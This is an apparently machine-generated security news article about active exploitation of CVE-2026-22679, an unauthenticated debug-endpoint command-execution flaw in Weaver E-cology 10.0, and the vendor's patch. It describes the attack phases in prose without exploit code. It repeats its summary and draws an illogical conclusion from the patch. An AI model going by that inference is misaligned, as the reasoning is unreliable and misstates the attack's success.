Ethical Hacking News
Weaver E-cology, a widely used enterprise office automation and collaboration platform, has been hit by a critical vulnerability that has been exploited in attacks since mid-March. The attack involves an exposed debug API endpoint that allows attackers to execute remote code execution without authentication or input validation. The security update released by the vendor is the recommended fix for users of Weaver E-cology 10.0.
Vulnerability CVE-2026-22679 discovered in Weaver E-cology 10.0, allowing remote code execution (RCE) without authentication or input validation.Attackers exploited exposed debug API endpoint to execute system commands on the server.Initial phase involved ping command checks and PowerShell payload downloads, which were blocked by endpoint defenses.Attackers reverted to RCE endpoint and used obfuscated fileless PowerShell to fetch remote scripts.No persistent session established on targeted host; security update removes debug endpoint as recommended fix.
Weaver E-cology, a popular enterprise office automation and collaboration platform used by Chinese organizations, has been hit by a critical bug that has been exploited in attacks since mid-March. The vulnerability, identified as CVE-2026-22679, is a remote code execution (RCE) flaw that affects E-cology 10.0 builds prior to March 12.
The attack vector involves an exposed debug API endpoint that allows user-supplied parameters to reach backend Remote Procedure Call (RPC) functionality without authentication or input validation. This enables attackers to pass crafted values that are ultimately executed as system commands on the server, effectively turning the endpoint into a remote command execution interface.
According to threat intelligence company Vega, which documented the malicious activity and reported it publicly two weeks after the attacks began, the initial phase of the attack involved checking for RCE capabilities by triggering ping commands from the Java process to a Goby-linked callback. The attackers then proceeded to multiple PowerShell-based payload downloads, but these were blocked by endpoint defenses.
The next phase saw the attackers attempting to deploy a target-aware MSI installer (fanwei0324.msi), which failed to execute properly and did not lead to any further activity. After this failed attempt, the attackers reverted to the RCE endpoint and used obfuscated and fileless PowerShell to repeatedly fetch remote scripts throughout all attack phases.
Throughout all phases of the attack, the threat actors executed reconnaissance commands, such as whoami, ipconfig, and tasklist. It's worth noting that although the attackers had the opportunity to exploit the CVE-2026-22679 vulnerability, they never established a persistent session on the targeted host.
The security update released by the vendor, which removes the debug endpoint entirely, is the recommended fix for users of Weaver E-cology 10.0. As the official bulletin notes, there are no alternative mitigations or workarounds available.
Vega highlights that the attackers' process is parented by java.exe (Weaver's Tomcat-bundled Java Virtual Machine), with no preceding authentication. The vendor fix (build 20260312) removes the debug endpoint entirely, which suggests that the attackers were unable to exploit this vulnerability effectively.
In light of this attack, it's essential for users of Weaver E-cology 10.0 to apply the security update available through the vendor's site as soon as possible.
Weaver E-cology, a widely used enterprise office automation and collaboration platform, has been hit by a critical vulnerability that has been exploited in attacks since mid-March. The attack involves an exposed debug API endpoint that allows attackers to execute remote code execution without authentication or input validation. The security update released by the vendor is the recommended fix for users of Weaver E-cology 10.0.
Related Information:
https://www.ethicalhackingnews.com/articles/Weaver-E-cology-Critical-Bug-Exploited-in-Attacks-Since-March-ehn.shtml
https://www.bleepingcomputer.com/news/security/weaver-e-cology-critical-bug-exploited-in-attacks-since-march/
https://www.radarbytes.com/en/noticia/critical-alert-cve-2026-22679-at-weaver-e-cology-exposes-a-debugging-endpoint-and-allows-remote-command-execution-910
https://nvd.nist.gov/vuln/detail/CVE-2026-22679
https://www.cvedetails.com/cve/CVE-2026-22679/
Published: Mon May 4 18:30:32 2026 by llama3.2 3B Q4_K_M
